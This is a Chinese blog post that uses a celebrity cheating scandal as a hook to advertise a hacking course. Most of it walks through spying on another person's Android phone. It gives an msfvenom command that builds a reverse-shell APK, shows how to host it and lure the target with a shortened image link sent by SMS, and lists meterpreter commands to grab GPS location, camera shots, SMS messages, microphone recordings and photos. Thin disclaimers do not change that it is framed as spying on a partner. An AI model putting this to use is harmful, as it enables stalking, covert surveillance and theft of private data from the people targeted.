黑客告訴你：從“羅志祥手機被女友周揚青翻看”事件中看信息安全

沒有看錯，小白嘿客今天給你們上一堂娛樂信息安全課。先上圖，不要驚訝你的三觀哈，你以為這是在拍懸疑黑客片？

彩蛋：文章後面有黑客乾貨，前面娛樂一哈！

羅志祥實錘要翻車了。不過我並不好奇一個男人的本色，作為一名白帽黑客的我只好奇女友周揚青是如何輕而易舉的查看小豬手機的？社交軟件和鎖屏都是形同虛設？還是小豬自己已經真的玩“嗨”了？

手機鎖屏了，還能被看？

先做個假設，省得有些槓精在說，他女友知道鎖屏密碼了唄！

一般手機用戶都會將自己的手機設上鎖屏密碼。顯然，對於那些不經常更換鎖屏密碼的兄嘚們，別說你女友不知道你的密碼，兄嘚你平時作風不好，時間久了，女友就會起疑心，趁你不注意，也會瞄到你的鎖屏密碼，接下來發生小豬這個大型翻車現場那也只是時間的問題了，手機聊天記錄，還有那些不正當私密照片？隨時都會被女友查看！

算了，如果是這種情況，小豬隻能平時太過於飄。要是兄嘚你也是如此，還想到處拈花惹草？下一個大型翻車現場的主角就是你了。

黑客大神提醒你：

• 精神小夥，性情勿旺盛；

• 鎖屏不規範，女友兩行淚；

• 開車不節制，翻車沒得救！

都說了，不是鎖屏的惹的禍

槓精開始你的演講：

如果鎖屏真沒有惹禍，社交軟件也被小豬設了登錄驗證，顯然小豬不該上這次熱搜。腦洞大開，難道是私人偵探，an網黑客爆料？

我深呼吸了幾口氣，這種例子不少見的，其實an網資源遠比你想象的豐富，我是一名合格的網民，在此提醒各位看官誤入歧途。但是由於文章需要，那就信手拈來一段。

曾經就在某an網看到過hacker出賣的kai房記錄，漢庭、喜來登、如家、格林豪泰等都是中招目標。幾百萬的數據，當然，我太窮，買不起，而且持有他人隱私數據也是非法，為了創建良好的網絡信息安全，我們應該做一個遵紀守法的中國人！

這裡只是拿出來分享下，你以為你有那麼安全？

不做虧心事，不怕鬼敲門！

對，所有的這些不安全，只針對那些跳進深淵的你。

尼采說過，

當你凝視著深淵，深淵也在凝視著你！

回到正題，一句話，就是你的社交、所有涉及到賬號、電子信息的環節都會在某些平臺或者網站上發生數據洩露，你平時所聽到的數據庫洩露就是啦！

科普：任何平臺在存儲你的個人kai房、身份、賬戶、地理位置等信息時，都會使用到數據庫，但凡這些數據庫所在的服務器如果被惡意者完成攻擊，或者數據庫被滲透，我只能呵呵了，裡面所有（包括你的）數據都會被掏空下載，販賣！誰要呢？那我就不告訴你了，販賣任何個人隱私數據都是犯法的，我們應該避而遠之！

說到數據庫的滲透測試，就需要學習Web攻防滲透知識了，可以點擊下方專欄卡片學習哈，這裡僅僅用作web信息安全學習使用！

如果小豬的個人信息（kai房、社交密碼）被女友通過其他途徑知曉，你說他能不翻車嗎？還要360度！

如果羅志祥手機信息沒有an網洩露？難道是傳說中黑客“遠控”？

看了標題，別懵啊！我來通過一個實戰告訴你，如何遠控手機，獲取信息、屏幕截圖、ding位、通訊錄、遠程lu像pai照...

哎呀，老規矩，只在滲透測試，使用自己的手機在局域網下進行安全測試，請勿用於不當目的，否則後果自負！

• 生成遠控

在kali下輸入：

<code>msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.251 LPORT=8888  R>muma.apk/<code>

槓精打住，免殺這裡豈能隨便放？我是遵守頭條規範的好作者！

以上遠控在部分手機可能會提示危險，因為沒有做免殺，還是那句話，學習安卓黑客滲透訓練營課程，點擊下方卡片進入我的頭條專欄哈！

• 製作圖片鏈接，讓目標下載

首先放一段簡單的html圖片鏈接代碼：

<code>/<code>

以上製作的圖片、遠控、以及鏈接網頁如下圖所示，這裡使用kali的apache2服務搭建。更多白帽黑客kali滲透實戰指南，請前往下方專欄卡片學習哈！

個人kali服務器

既然製作好了圖片鏈接web服務器，為了能you惑他人放心點擊，我們需要進行短鏈接處理下，如圖所示：（這裡你就不要去驗證了，一次性的短鏈接！）

另外，你在局域網下生成的短鏈接，原始鏈接應該做個端口轉發，不然別人無法訪問哈！

想獲取短鏈接處理的，關注我獲取哈！

• 通過社交平臺發送鍛鍊給對方

如果你是一個喜歡在網上註冊信息、搞過網貸、玩過菠菜的，你應該時常收到這樣的短鏈接，還是不要因為好奇去點擊，真是好奇害死貓的。

如圖，我已經將圖片的短鏈接通過短信發送給目標，你說她能不打開嗎？

誰點，誰吃虧！我這裡說了哈，絕不要點擊這種釣魚式的短鏈接！

這時，她真的點了，點了，你看吧：

難道這個綠茶表是你男人的意中人？趕快點擊圖片！

突然彈出一個你的男人.apk文件，不管了，為了負心漢，我下載安裝看看，然後就有了下面的故事。

裝了我的遠控，幾個命令就知道小豬在幹嘛！

kali下啟動msfconsole，並設置好監聽端：

只要，對方安裝了這個文件，你懂得，kali就會立即得到反彈會話，簡單地說，對方的手機最高權限已經在你手上了。

接下來看看，得到遠控連接有什麼作用吧！

• 獲取目標地理位置

<code>geolocate/<code>

看不懂？就是gps定位，顯示高精度的經緯度信息。如下圖，已打碼！防止信息洩露！

• 獲取對方攝像頭，拍個照？

<code>webcam_snap/<code>

這看得懂吧！手機總有對著人的時候，賓館？酒店，那是很有可能的！

• 下載遠程手機照片？

<code>download/<code>

• 遠控控制手機發送短信

<code>send_sms/<code>

• 遠程錄音

<code>record_mic/<code>

• 獲取對方短信

<code>dump_sms/<code>

更多這裡不一一列出了，只要手機支持的，全能使用！如需瞭解更多手機滲透，可以點擊《安卓黑客滲透訓練營》進入學習。

信息安全？

隨著智能設備的大量普及與使用，小到智能手錶，手機，大到電腦、傢俱物聯網設備，無一不藏匿著設備信息安全的隱患，甚至是個人隱私的曝光，想想細思極恐。

所以防止黑客入侵，保護信息安全的最好手段就是去了解黑客，瞭解技術，所謂：

知己知彼，百戰不殆！

那就趕快加入吧！關注我，進入我頭條主頁，找到專欄頁面，加入到相應的專欄，你也能成為一名安全紅客！

歡迎點贊、評論！